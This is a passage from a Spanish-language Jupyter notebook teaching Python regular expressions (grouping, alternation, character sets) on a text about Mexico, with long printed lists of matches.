Los responsables directos de la masacre fueron grupos paramilitares opuestos al Ejército Zapatista de Liberación Nacional (EZLN)\n(y estos por Municipios) en todo lo concerniente a su régimen interior, y por la Ciudad de México (capital del país); unidos en una federación establecida según los principios de su Constitución. De acuerdo con esta ley fundamental, la soberanía y el poder público son origen y correspondencia del pueblo, y es este el que decide ejercerlo a través de un sistema de separación de poderes: Presidente (Ejecutivo), Congreso de la Unión (Legislativo)\n(Fiscalía General de la República, CNDH, Auditoria Superior de la Federación, Banco de México, INEGI, Cofece, IFT e INAI)\n(si la ausencia es el día de la toma de posesión, sería el presidente del Senado, el mandatario provisional)\n(y repartida entre las dos cámaras)\n(excepto el Presidente, cuestión que corresponde al Senado) en caso de cometer un delito, en los términos del artículo 111 constitucional; designar a los titulares de los órganos autónomos (INE, CNDH, Auditoria Superior, Banco de México, INEGI, Cofece e IFT)\n(a través de la Guardia Nacional)\n(abarcando catorce artículos) de la Constitución Política de los Estados Unidos Mexicanos y la \"Ley Orgánica del Poder Judicial de la Federación\". El Jurado Federal de Ciudadanos y los tribunales de los Estados y de la Ciudad de México, pueden actuar en auxilio de la Justicia Federal, en los casos previstos por la Constitución y las leyes. La administración, vigilancia y disciplina del Poder Judicial de la Federación, con excepción de la Suprema Corte de Justicia y el Tribunal Electoral, está a cargo del Consejo de la Judicatura Federal. 
En este poder y su conjunto de órganos, se deposita la facultad de impartir justicia en todos los aspectos institucionales del estado mexicano; la aplicación de las normas y principios jurídicos en la resolución de conflictos; y en todos los ámbitos de la aplicación del Derecho y la interpretación de las leyes en la sociedad (civil, penal, constitucional, mercantil, laboral, administrativo, fiscal, procesal, etc.)\n(policía estatal y guardia nacional adscrita)\n(ayuntamiento)\n(espacio aéreo, mares e ). Entendiendo este concepto como un ordenamiento de división política, el país se compone de 32 entidades federativas (31 estados y la Ciudad de México, capital de la república)\n(Instituto Nacional Electoral, Tribunal electoral y Fiscalía electoral). El INE (bajo su anterior denominación \"IFE\")\n(PRD), el Partido Acción Nacional (PAN), el Partido Revolucionario Institucional (PRI), el Partido del Trabajo (PT), el Partido Verde Ecologista de México (Verde), el partido Movimiento Ciudadano (MC) y el Partido MORENA (Movimiento Regeneración Nacional)\n(2000-2006), la política exterior de México se orientó a proyectar una nueva imagen de México al mundo y favorecer la relación con Estados Unidos. México buscó protagonismo donde no lo había tenido por decisión propia, por ejemplo, postulando fallidamente a Luis Ernesto Derbez a la Secretaría General de la Organización de Estados Americanos (OEA). El acercamiento de la administración foxista hacia Estados Unidos fue acompañado por el distanciamiento respecto a América Latina. 
Con la llegada de Calderón a la presidencia hubo un cierto acercamiento con América Latina (particularmente con Cuba, Venezuela, Bolivia y Ecuador)\n(y todos los organismos conexos del sistema de Naciones Unidas)\n(ningún otro país del mundo tiene un número similar en una sola nación receptora)\n(a cargo del Ejército Mexicano y la Fuerza Aérea Mexicana)y Secretaría de Marina (a cargo de la Armada de México)\n(para las dos primeras ramas)\n(a 3395 msnm de altitud). En el Eje Neovolcánico, de gran actividad volcánica como su nombre lo indica, se ubican los picos más altos de México: el Pico de Orizaba o Citlaltépetl (5610 m), el Popocatépetl (5462 m), el Iztaccíhuatl (5286 m), el Nevado de Toluca (4690 m) La Malinche (4461 m) y el Nevado de Colima (4340 m)\n(4117 m)\n(2054 m)\n(Socorro, Clarión, San Benedicto, roca Partida)\n(una zona tropical y una templada)\n(que concentra el 80% de la población mexicana)\n(12 °C) y julio (16,1 °C)\n(1885 millas)\n(ecosistemas inalterados), 64 parques nacionales, 4 monumentos naturales, 26 áreas para proteger la flora y la fauna, 4 áreas para la protección natural y 17 santuarios (zonas con rica diversidad de especies)\n(20 hembras y 3 machos)\n(de las que a la fecha solo se conservan dos: Pemex y la Comisión Federal de Electricidad), y un crecimiento económico dependiente de las exportaciones de manufacturas (básicamente, hacia Estados Unidos)\n(NAFTA, por sus siglas en inglés, o TLCAN), que firmó con los Estados Unidos y con Canadá. 
México también cuenta con un tratado de libre comercio con la Unión Europea, con el bloque denominado EFTA (Luxemburgo, Suiza, Liechtenstein y Noruega)\n(\"World Government Bond Index\", en inglés)\n(exploración, refinación, comercialización y exportación) por la empresa estatal Pemex (Petróleos Mexicanos)\n(particularmente la española)\n(TTCI por sus siglas en inglés)\n(H1N1)\n(H1N1)\n(Coneval)\n(CFE), organismo que a partir de octubre de 2009, en una acción que generó mucha polémica, tomó control del área geográfica (centro del país) que hasta entonces administraba la Compañía de Luz y Fuerza del Centro (LFC). La CFE está encargada, como su nombre lo indica, de la operación de las plantas generadoras de electricidad y su distribución en todo el territorio nacional. La otra empresa encargada de la explotación de los recursos energéticos es Petróleos Mexicanos (Pemex)\n(a diciembre de 2007)\n(PEMEX)\n(CAPUFE)\n(Imevisión), aunque desde el inicio los particulares tuvieron derecho a concesiones. En la actualidad, existen tres empresas televisivas privadas que acaparan la mayor parte del mercado (Televisa, TV Azteca e Imagen Televisión)\n(IMER)\n(nacional e internacional)\n(Internet)\n(\"100 mexicanos dijeron\" y \"Qué dice la gente\"), \"Big Brother\", \"Operación Triunfo\" y \"La Voz... México\". Las demostraciones nacionales de las noticias como las noticias de Adela en Televisa se asemejan a un híbrido entre Donahue y Nightline (programas estadounidenses)\n(en orden alfabético)\n(SPR). Además de las empresas privadas, existen otros operadores tanto públicos como privados con cadenas de menor cobertura (destacando, Multimedios Televisión y Canal 13.1 HD de Telsusa)\n( y solo 1 hay en San Luis Potosí), 852 estaciones son de Amplitud Modulada y 728 estaciones son de Frecuencia Modulada. Los estados con más estaciones son: Sonora y Oaxaca (tienen hasta 100 estaciones en todo el estado). 
El estado con menos estaciones de radio es Tlaxcala (solo seis)\n(Ensenada, Mexicali y Tijuana)\n(1950-1980). La población mexicana se duplicaba en veinte años, y a ese ritmo se esperaba que para el año 2000 hubiera 120 millones de mexicanos. Ante esta situación, el gobierno federal creó el Consejo Nacional de Población (CONAPO), con la misión de establecer políticas de control de la natalidad y realizar investigaciones sobre la población del país. Las medidas resultaron exitosas, y la tasa de crecimiento descendió hasta 1.6 en el período de 1995 a 2000. La esperanza de vida pasó de 36 años (en 1895) a 72 años (en el año 2000)\n(pueblos, rancherías, caseríos). El censo de 1960 arrojó datos en los que la población urbana era por primera vez mayor que la rural (50,6% del total)\n(Coahuila y Durango), y Tampico (Tamaulipas y Veracruz)\n(1925)\n(Inegi) y por la Comisión Nacional para el Desarrollo de los Pueblos Indígenas (anteriormente el Instituto Nacional Indigenista) (INI)\n(1 de cada 100 habitantes)\n(Estados Unidos y Guatemala)\n(IISS)\n(SESNSP)\n(Iglesia católica y Estado)\n(casi 93 millones de adeptos según el censo de 2010)\n(Séptimo Día). Los fenómenos migratorios han propiciado la proliferación de diferentes vertientes del cristianismo, incluidas ramas protestantes históricas (como la Iglesia Anglicana, Presbiteriana, Metodista, Bautista)\n(en textos editados por la Universidad Nacional Autónoma de México), es notable la pervivencia de rituales de tipo mágico-religioso de los antiguos grupos indígenas, no solo en los indígenas actuales sino en los mestizos y blancos que conforman la sociedad mexicana rural y urbana. Existe frecuentemente un sincretismo entre el chamanismo y la tradición católica. Otra religión de sincretismo popular en México (sobre todo en los últimos años) es la santería. 
Esto se debe principalmente a la gran cantidad de cubanos que se asentaron en el territorio tras la Revolución cubana (principalmente en estados como Veracruz y Yucatán)\n(cerca del 3 por ciento del universo contemplado en los tabulados del INEGI)\n(el tequio o trabajo comunitario, la participación en las fiestas patronales y cuestiones similares)\n(ILV), en el año 1979, al cual se acusó de promover la división de los pueblos indígenas al traducir la Biblia a los idiomas vernáculos y evangelizar en un credo protestante que amenazaba la integridad de las culturas populares. El gobierno mexicano prestó atención al llamamiento de los antropólogos y canceló el convenio que tenía celebrado con el ILV. Los conflictos también se han dado en otros ámbitos de la vida social. Por ejemplo, dado que los Testigos de Jehová tienen prohibida la rendición de honores a los símbolos patrios (algo que en las escuelas públicas de México se realiza cada lunes)\n(en Polanco, Tecamachalco, Interlomas, Santa Fe, Satélite y en el Centro Histórico)\n(zen y tibetano)\n(la información varía según las diversas fuentes)\n(o \"Plattdeutsch\"), lengua clasificada como bajo sajón (o «bajo alemán»)\n(27.2% del total de discapacitados a nivel nacional)\n(29% de la población)\n(literatura), Alfonso García Robles (paz) y Mario J. Molina (química)\n(el carácter de lo mexicano, la mexicanidad, la definición de lo mexicano)\n(monocordio)\n(es decir, el traje de los ricos hacendados ganaderos). Interpretaban \"sones de mariachi\" hasta su llegada a la Ciudad de México, a principios del siglo XX donde se transformaron (y continúan haciéndolo)\n(huapango), son abajeño y muchos más. 
Géneros de aparición más tardía son la jarana y la trova yucateca, que se cultivan en la península de Yucatán, y que recibieron influencia caribeña (especialmente del son cubano) e incluso andina (bambuco colombiano)\n(algo así como una \"suite\" mexicana) el nombre viene del tiempo en el que los \"boticarios\" (farmacéuticos)\n(término no muy claro)\n(María del Rosario Graciela Rayas Trejo)\n(grupero)\n(o rock nacional, representado por Maná, El Tri, Molotov, Caifanes, Café Tacvba, Julieta Venegas y Panda, entre otros)\n(mariachi light)\n(de metales y alientos) en un fenómeno mediático y comercial, también urbano debido a la incesante migración de campesinos a las grandes ciudades. Junto con la \"Banda Sinaloense\", el género más difundido por algunos musicólogos representa la asimilación al sur del Estados Unidos a su vez \"chicanizado\" y tiene una enorme aceptación en todo el país. Consiste en una combinación de la música norteña con el \"country\" (que algunos etnomusicólogos afirman, nació en Coahuila)\n(cazadores)\n(para no ser reconocidos)\n(a partir de que la filosofía llega a las Universidades como disciplina de estudio profesional)\n(mayas, olmecas, toltecas, mixtecas, aztecas)\n(del náhuatl; obrero o alarife)\n(España-Marruecos)\n(1944)\n(declarada Memoria del Mundo por la UNESCO en 2003)\n(conocido en casi todo el mundo hispanoparlante como \"ají\")\n(biznaga)\n(menonitas)\n(\"¿Cuánto vale la cultura?\")\n(I.N.A.H.)\n(I.N.B.A.)\n(1993 y 2001)\n(escrito y pronunciado \"beisbol\", localmente), el cual según las últimas encuestas es el tercer deporte más popular en México. El béisbol es el deporte más popular en las regiones norte y sureste. México cuenta con varias ligas profesionales, entre las que destacan la Liga Mexicana de Béisbol (LMB) y la Liga Mexicana del Pacífico (LMP). 
La popularidad de la \"LMB\" se debe a que los equipos con los que cuenta están distribuidos por casi todo el país; es la de mayor tradición, pues fue fundada en 1925; y ha aportado la mayoría de los peloteros mexicanos que llegan a las Grandes Ligas, está afiliada a las Ligas Menores de los Estados Unidos bajo la clasificación 'AAA' y tiene su propia academia de desarrollo de talentos ubicada en El Carmen, Nuevo León; la conforman actualmente 16 equipos divididos en 2 zonas (Zona Norte y Zona Sur). La \"LMP\" se juega en invierno, por lo que su temporada es más corta y recibe a algunos de los peloteros (mexicanos y extranjeros)\n(LIV), cuyo equipo campeón representó a México en la Serie Latinoamericana, la Liga Invernal de Béisbol Nayarita (LIBN), la Liga Norte de México (LNM), la Liga Norte de Sonora (LNS), la Liga Mayor de Béisbol de La Laguna (LMBL), la Liga Estatal de Béisbol de Chihuahua (LEB), la Liga del Norte de Coahuila (LNC), la Liga Invernal Mexicana (LIM), la Liga Peninsular de Béisbol (LPB), la Liga Meridana de Invierno (LMI), la Liga Veracruzana Estatal de Béisbol (LVEB), cuyo equipo campeón representa en la actualidad a México en la Serie Latinoamericana, y la Liga Tabasqueña de Béisbol (LTB)\n(escrito y pronunciado \"basquetbol\", en el propio país); sin embargo, es el cuarto más popular, después del fútbol, el boxeo y el béisbol. 
Actualmente la liga más importante en el país en este deporte es la Liga Nacional de Baloncesto Profesional (LNBP), y en la rama femenil la Liga Mexicana de Baloncesto Profesional Femenil (LMBPF); además de algunas ligas regionales como el Circuito de Baloncesto de la Costa del Pacífico (CIBACOPA) y el Circuito de Baloncesto del Pacífico (CIBAPAC) que, como sus nombres lo indican, las componen equipos de esa zona, así como la Liga de Baloncesto del Sureste (LBS), que incluye a los equipos de esa parte del país, el Circuito de Básquetbol del Noreste (CIBANE), que como su nombre lo indica, lo componen equipos de esa región, la Liga Premier de Baloncesto (LPB) y la Liga de Básquetbol Estatal de Chihuahua (LBE), ambas con base en el estado de Chihuahua. Estas ligas regionales tienen participación en los meses de descanso de la \"LNBP\" que, dicho sea de paso, volverá a tener competencia ante el inminente regreso del Circuito Mexicano de Básquetbol (CIMEBA)\n(LMV) con el aval de la Federación Mexicana de Voleibol (FMVB), misma que entró en vigor en 2014 en ambas ramas, dando lugar a la Liga Mexicana de Voleibol Varonil (LMVV) y a la Liga Mexicana de Voleibol Femenil (LMVF). Esto con el objetivo de que ambos circuitos fueran la base para integrar a las selecciones nacionales de cara al ciclo olímpico de Río de Janeiro 2016, ya que se formaron equipos de varias partes del país con la finalidad de observarlos. No obstante, este no fue el primer intento de una liga profesional de voleibol en México, ya que anteriormente la Liga Premier de Voleibol (LPV)\n(LFA), con el respaldo de la Federación Mexicana de Fútbol Americano (FMFA), misma que entró en vigor en febrero de dicho año con 4 equipos, 3 de la Ciudad de México y 1 del Estado de México, teniendo como sede el Estadio Jesús Martínez \"Palillo\" de la Ciudad Deportiva de La Magdalena Mixiuhca. 
En la actualidad está conformada por ocho equipos, tres de ellos de la Ciudad de México, dos del Estado de México, uno de Coahuila, uno de Nuevo León y uno más de Puebla. Además en 2018 se fundó la Liga Fútbol Americano de México (FAM)\n(LMEH)\n(Varonil), Frontón Cubano (Varonil), Frontón a Mano con Pelota Dura en Tres Paredes y en Trinquete (Varonil), Pala Corta (Varonil), Paleta con Pelota de Cuero en 3 Paredes y en Trinquete (Varonil), Paleta con Pelota de Goma en 3 Paredes (Varonil) y en Trinquete (Femenil y Varonil); así como Frontenis (Femenil y Varonil)\n(50 de oro, 41 de plata y 32 de bronce)\n(Federación Internacional del Automóvil por sus siglas en francés)\n(levantadora de pesas)\n(1968) y un Campeonato Mundial de Fútbol (1970) en un período de dos años (Después lo lograrían Alemania: Juegos Olímpicos en 1972 y Mundial 1974; Estados Unidos: Mundial 1994 y Juegos Olímpicos de 1996; y Brasil: Copa del Mundo de 2014 y Juegos Olímpicos de 2016)\n\n ############\n ############\n ############\n\n()\n(31 estados y la capital federal)\n(principalmente el segundo tercio)\n(PIB)\n(PPA)\n(Capitanía General de Guatemala, Cuba, Florida, Puerto Rico y la parte española de la isla de Santo Domingo —hoy República Dominicana—)\n(usado como adjetivo)\n(Plan de Iguala y Tratados de Córdoba)\n(América Septentrional y América Mexicana)\n(s. XVI)\n(maguey)\n(liebre)\n(locativo)\n(tli)\n(luna)\n(tli)\n(ombligo, centro)\n(locativo)\n(12 000 a. C.)\n(8000 a. C.)\n(1000 a. C.)\n(10 500 a. C.)\n(siglos XV-IV a. 
C.)\n(Estado de México)\n(Que significa «serpiente emplumada»)\n(que significa: «néctar de la tierra», aunque a este Dios también lo veneraban en la cultura maya y zapoteca)\n(teocracia)\n(el dios creador de los mayas quiches)\n(el dios creador de los mayas yucatecos)\n(dios del bordado y la pintura)\n(Quetzalcóatl)\n(dios del viento)\n(dios del sol)\n(diosa de la luna)\n(dios del agua)\n(dios del maíz y la agricultura)\n(dios de la muerte)\n(o aztecas)\n(1517)\n(1518)\n(1546)\n(1540-1551)\n(1734-1737)\n(1761)\n(notoriamente, Zacatecas y Guanajuato)\n(golfo de México)\n(océano Pacífico)\n(también llamado Monte Pío)\n(en especial desde la llegada de los Borbones, que propugnaron el modelo francés de colonización, contra los cuales los criollos o hijos de españoles nacidos en México empezaron a resentirse)\n(Guanajuato)\n(en cualquiera de sus variantes como bandos antagónicos: republicanos contra monárquicos y federalistas contra centralistas)\n(los actuales estados de California, Arizona, Nuevo México, Nevada y Utah; y porciones de Colorado, Oklahoma, Kansas y Wyoming)\n(1853-1855)\n(1906)\n(1907)\n(Tlaxcalantongo, 1920)\n(Chinameca, 1919)\n(Parral, 1923)\n(PNR)\n(PRI)\n(1934-1940)\n(1988-1994)\n(CCRI-CG)\n(EZLN)\n(y estos por Municipios)\n(capital del país)\n(Ejecutivo)\n(Legislativo)\n(Fiscalía General de la República, CNDH, Auditoria Superior de la Federación, Banco de México, INEGI, Cofece, IFT e INAI)\n(si la ausencia es el día de la toma de posesión, sería el presidente del Senado, el mandatario provisional)\n(y repartida entre las dos cámaras)\n(excepto el Presidente, cuestión que corresponde al Senado)\n(INE, CNDH, Auditoria Superior, Banco de México, INEGI, Cofece e IFT)\n(a través de la Guardia Nacional)\n(abarcando catorce artículos)\n(civil, penal, constitucional, mercantil, laboral, administrativo, fiscal, procesal, etc.)\n(policía estatal y guardia nacional adscrita)\n(ayuntamiento)\n(espacio aéreo, mares e )\n(31 estados y la Ciudad de México, capital 
de la república)\n(Instituto Nacional Electoral, Tribunal electoral y Fiscalía electoral)\n(bajo su anterior denominación \"IFE\")\n(PRD)\n(PAN)\n(PRI)\n(PT)\n(Verde)\n(MC)\n(Movimiento Regeneración Nacional)\n(2000-2006)\n(OEA)\n(particularmente con Cuba, Venezuela, Bolivia y Ecuador)\n(y todos los organismos conexos del sistema de Naciones Unidas)\n(ningún otro país del mundo tiene un número similar en una sola nación receptora)\n(a cargo del Ejército Mexicano y la Fuerza Aérea Mexicana)\n(a cargo de la Armada de México)\n(para las dos primeras ramas)\n(a 3395 msnm de altitud)\n(5610 m)\n(5462 m)\n(5286 m)\n(4690 m)\n(4461 m)\n(4340 m)\n(4117 m)\n(2054 m)\n(Socorro, Clarión, San Benedicto, roca Partida)\n(una zona tropical y una templada)\n(que concentra el 80% de la población mexicana)\n(12 °C)\n(16,1 °C)\n(1885 millas)\n(ecosistemas inalterados)\n(zonas con rica diversidad de especies)\n(20 hembras y 3 machos)\n(de las que a la fecha solo se conservan dos: Pemex y la Comisión Federal de Electricidad)\n(básicamente, hacia Estados Unidos)\n(NAFTA, por sus siglas en inglés, o TLCAN)\n(Luxemburgo, Suiza, Liechtenstein y Noruega)\n(\"World Government Bond Index\", en inglés)\n(exploración, refinación, comercialización y exportación)\n(Petróleos Mexicanos)\n(particularmente la española)\n(TTCI por sus siglas en inglés)\n(H1N1)\n(H1N1)\n(Coneval)\n(CFE)\n(centro del país)\n(LFC)\n(Pemex)\n(a diciembre de 2007)\n(PEMEX)\n(CAPUFE)\n(Imevisión)\n(Televisa, TV Azteca e Imagen Televisión)\n(IMER)\n(nacional e internacional)\n(Internet)\n(\"100 mexicanos dijeron\" y \"Qué dice la gente\")\n(programas estadounidenses)\n(en orden alfabético)\n(SPR)\n(destacando, Multimedios Televisión y Canal 13.1 HD de Telsusa)\n( y solo 1 hay en San Luis Potosí)\n(tienen hasta 100 estaciones en todo el estado)\n(solo seis)\n(Ensenada, Mexicali y Tijuana)\n(1950-1980)\n(CONAPO)\n(en 1895)\n(en el año 2000)\n(pueblos, rancherías, caseríos)\n(50,6% del total)\n(Coahuila y Durango)\n(Tamaulipas 
y Veracruz)\n(1925)\n(Inegi)\n(anteriormente el Instituto Nacional Indigenista)\n(INI)\n(1 de cada 100 habitantes)\n(Estados Unidos y Guatemala)\n(IISS)\n(SESNSP)\n(Iglesia católica y Estado)\n(casi 93 millones de adeptos según el censo de 2010)\n(Séptimo Día)\n(como la Iglesia Anglicana, Presbiteriana, Metodista, Bautista)\n(en textos editados por la Universidad Nacional Autónoma de México)\n(sobre todo en los últimos años)\n(principalmente en estados como Veracruz y Yucatán)\n(cerca del 3 por ciento del universo contemplado en los tabulados del INEGI)\n(el tequio o trabajo comunitario, la participación en las fiestas patronales y cuestiones similares)\n(ILV)\n(algo que en las escuelas públicas de México se realiza cada lunes)\n(en Polanco, Tecamachalco, Interlomas, Santa Fe, Satélite y en el Centro Histórico)\n(zen y tibetano)\n(la información varía según las diversas fuentes)\n(o \"Plattdeutsch\")\n(o «bajo alemán»)\n(27.2% del total de discapacitados a nivel nacional)\n(29% de la población)\n(literatura)\n(paz)\n(química)\n(el carácter de lo mexicano, la mexicanidad, la definición de lo mexicano)\n(monocordio)\n(es decir, el traje de los ricos hacendados ganaderos)\n(y continúan haciéndolo)\n(huapango)\n(especialmente del son cubano)\n(bambuco colombiano)\n(algo así como una \"suite\" mexicana)\n(farmacéuticos)\n(término no muy claro)\n(María del Rosario Graciela Rayas Trejo)\n(grupero)\n(o rock nacional, representado por Maná, El Tri, Molotov, Caifanes, Café Tacvba, Julieta Venegas y Panda, entre otros)\n(mariachi light)\n(de metales y alientos)\n(que algunos etnomusicólogos afirman, nació en Coahuila)\n(cazadores)\n(para no ser reconocidos)\n(a partir de que la filosofía llega a las Universidades como disciplina de estudio profesional)\n(mayas, olmecas, toltecas, mixtecas, aztecas)\n(del náhuatl; obrero o alarife)\n(España-Marruecos)\n(1944)\n(declarada Memoria del Mundo por la UNESCO en 2003)\n(conocido en casi todo el mundo hispanoparlante como 
\"ají\")\n(biznaga)\n(menonitas)\n(\"¿Cuánto vale la cultura?\")\n(I.N.A.H.)\n(I.N.B.A.)\n(1993 y 2001)\n(escrito y pronunciado \"beisbol\", localmente)\n(LMB)\n(LMP)\n(Zona Norte y Zona Sur)\n(mexicanos y extranjeros)\n(LIV)\n(LIBN)\n(LNM)\n(LNS)\n(LMBL)\n(LEB)\n(LNC)\n(LIM)\n(LPB)\n(LMI)\n(LVEB)\n(LTB)\n(escrito y pronunciado \"basquetbol\", en el propio país)\n(LNBP)\n(LMBPF)\n(CIBACOPA)\n(CIBAPAC)\n(LBS)\n(CIBANE)\n(LPB)\n(LBE)\n(CIMEBA)\n(LMV)\n(FMVB)\n(LMVV)\n(LMVF)\n(LPV)\n(LFA)\n(FMFA)\n(FAM)\n(LMEH)\n(Varonil)\n(Varonil)\n(Varonil)\n(Varonil)\n(Varonil)\n(Varonil)\n(Femenil y Varonil)\n(Femenil y Varonil)\n(50 de oro, 41 de plata y 32 de bronce)\n(Federación Internacional del Automóvil por sus siglas en francés)\n(levantadora de pesas)\n(1968)\n(1970)\n(Después lo lograrían Alemania: Juegos Olímpicos en 1972 y Mundial 1974; Estados Unidos: Mundial 1994 y Juegos Olímpicos de 1996; y Brasil: Copa del Mundo de 2014 y Juegos Olímpicos de 2016)\n" ] ], [ [ "Matamos dos pajaros de un tiro, podemos analizar la diferencia entre una expresión codiciosa y una reacia; y además, observamos un uso de la diagonal invertida (`\\`): Cancelar el efecto de los símbolos especiales.", "_____no_output_____" ], [ "##### ( )", "_____no_output_____" ], [ "Los paréntesis tienen exactamente el efecto que uno podría esperar: agrupar. Eso quiere decir que se puede aplicar instrucciones a mas de un caracter a la vez.", "_____no_output_____" ] ], [ [ "expresion_parentesis = re.compile(r\"(el)?(los)? 
país(es)?\")\nbusqueda = expresion_parentesis.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", " país\nel país\nel país\n país\nel país\nel país\n país\nel país\nlos países\n países\n país\nel país\nel país\nel país\nel país\n país\nel país\nel país\nel país\n país\nel país\nel país\n país\nel país\nel país\nel país\nel país\nel país\nel país\n país\nel país\nel país\nel país\n país\n país\n país\nel país\n países\nel país\nel país\n país\n países\nel país\nel país\nel país\n país\nel país\n país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\n países\n país\nel país\nel país\n países\n país\n país\nel país\nel país\nel país\n país\nel país\nel país\nel país\nel país\nel país\n país\n países\n país\nlos países\nel país\nel país\nel país\nlos países\nel país\n país\n países\nel país\nel país\n países\nel país\nel país\n países\nel país\n países\n países\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\n país\nel país\n país\nel país\nlos países\nel país\nel país\nel país\nel país\nel país\nel país\n país\nel país\nel país\n países\n países\n país\n país\nel país\n país\n país\nel país\n país\n países\n país\n país\n país\nel país\n países\nel país\nel país\nel país\nel país\nel país\nel país\nel país\n países\nel país\n país\nel país\nel país\nel país\nel país\n países\nel país\nel país\nel país\nel país\nel país\nel país\n países\nel país\nel país\nel país\n país\n países\nel país\nel país\n país\nel país\nel país\nel país\n países\nel país\n país\nel país\nel país\nlos países\nel país\nel país\nlos países\n países\nlos países\nel país\nel país\nel país\nel país\nel país\n país\nel país\nel país\n país\nel país\nel país\nel país\nel país\nel país\nel país\n país\nel país\n país\n país\n" ] ], [ [ "##### |", "_____no_output_____" ], [ "Podemos ver que el código anterior es mas o menos equivalente a buscar \"el país\" o \"los países\" o incluso solo \"países\". 
Pero con esa construcción, en realidad también se podrían encontrar cosas como \"ellos países\" si es que algo así estuviera en el texto.\n\nAfortunadamente las expresiones regulares cuentan con instrucción específica para lograr un OR.", "_____no_output_____" ] ], [ [ "expresion_barra = re.compile(r\"(el|los) país(es)?\")\nbusqueda = expresion_barra.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "el país\nel país\nel país\nel país\nel país\nlos países\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nlos países\nel país\nel país\nel país\nlos países\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nlos países\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nlos países\nel país\nel país\nlos países\nlos países\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\n" ] ], [ [ "##### [ ]", "_____no_output_____" ], [ "Los corchetes tienen la función de formar conjuntos de caracteres. Hasta ahora hemos usado punto (`.`) para cuando queremos acpetar más de un posible caracter. 
En expresiones como: `r\"M..ic.\"` ; la naturaleza del texto provocó que solo se obtuvieran cosas relacionadas con México, pero fácilmente la expresión hubiera aceptado \"Mítico\" también. Para esos casos podemos tener conjuntos de caracteres restringidos que se pueden aceptar.", "_____no_output_____" ], [ "Además, los conjuntos se pueden formar como rangos, o también pueden usarse como negación de conjuntos.", "_____no_output_____" ] ], [ [ "expresion_corchetes = re.compile(r\"[Mm].[xj]ic[^ \\n]+\")\nbusqueda = expresion_corchetes.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "México\">\nMéxico\nMéxico\nMexicanos,\nMéxico.\nmexicano\nMéxico\nMéxico\nMéxico\nMéxico\nmexicano\nMéxico\nmexica\nMéxico,\nmexicanos.\nMéxico\nMéxico\nMexicana\nMéxico\"\nMexicana),\nMejicano.\nMexicano,\nMexicanos,\nMexicana\"\nMexicanos\".\nMexicana,\nMexicanos\".\nMexicanos\".\nMéxico\",\nmexicano\"\nmexicanos\nMéxico-Tenochtitlan\nMéxico\nmexicanos.\nMéxico\"\nmexicano\nmexicas.\nmexicas\nMéxico\nMéxico\nMéxico\nMéxico,\nMéxico\nMéxico),\nMéxico:\nMéxico\nMexicas\nMéxico,\nmexicas\nMéxico-Tenochtitlán.\nmexica\nMéxico-Tenochtitlan.\nmexicas,\nmexicas\nMéxico-Tenochtitlan,\nMéxico.\nMéxico\nMéxico\nMéxico;\nMéxico)\nMéxico\nMéxico\nMéxico.\nMéxico,\nMéxico\nmexicano,\nmexicanas\nMéxico.\nMéxico\nMéxico\nMéxico\nmexicano\nMéxico,\nmexicana.\nMéxico\nMexicano,\nMéxico.\nMéxico\nMéxico\nmexicano.\nmexicana\nMéxico\nMéxico.\nmexicano\nmexicano\nMéxico\nMéxico\nmexicano\nmexicano\nMéxico,\nMexicanos\nMéxico\nmexicano.\nMéxico,\nMexicanos\nMéxico,\nmexicano;\nMexicana\nmexicanos\nMéxico—.\nmexicana\nMéxico\nMéxico\nMexicanos;\nMéxico,\nMéxico\nmexicano\nmexicana\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nmexicanas.\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexicano\nMexicana)y\nMéxico).\nMéxico.\nmexicanas\nMexicana,\nMéxico\nMéxico\nMéxico\nMéxico\nmexicano\nMéxico:\nmexicano\nMexicana,\nMéxico,\nmexicana.\nMéxico\nMéxico\nMexicali,\nMéxico\nMéxico,\nMéxico.
\nmexicano,\nMexicana.\nmexicana),\nMéxico\nMexicali,\nMéxico\nmexicanos\nMéxico\nMéxico;\nMéxico.\nMéxico;\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nmexicanas.\nmexicano\nMéxico,\nMéxico;\nmexicano\nmexicana\nMéxico.\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico.\nmexicanos\nMéxico\nmexicanas,\nmexicano.\nMéxico\nmexicana\nMéxico\nmexicano.\nmexicano;\nmexicana.\nMéxico\nMéxico\nmexicana\nMéxico\nmexicanos\nmexicana\nMéxico\nmexicana,\nMéxico\nmexicanas\nMéxico\nMéxico\nMéxico\nMexicanos),\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nmexicana.\nMéxico\nMéxico\nMéxico\nmexicano\nmexicanos\nMéxico\nMéxico,\nMéxico\nmexicano\nMéxico,\nmexicanas\nmexicano\nmexicanos\nmexicano\nmexicanos\nmexicanos\nmexicanos\nMéxico,\nmexicana\nMéxico\nmexicana,\nmexicanas\nMexicano\"\nmexicano,\nMéxico\nMéxico\nmexicanos\nMéxico\nmexicanos.\nmexicana\nMéxico,\nMexicanos\nmexicanos\nMéxico\nMéxico\nMéxico\nMexicanos\nMéxico,\nMéxico\nMéxico,\nMéxico\nMéxico,\nMéxico\nMéxico\nMéxico,\nMéxico\nMéxico\nMexicali,\nMéxico\nMéxico\nMéxico\nMéxico.\nMéxico,\nMexicana,\nMéxico\nMéxico\nMéxico\nMéxico.\nMexicano\nMexicano\nMexicano\nMéxico\nMéxi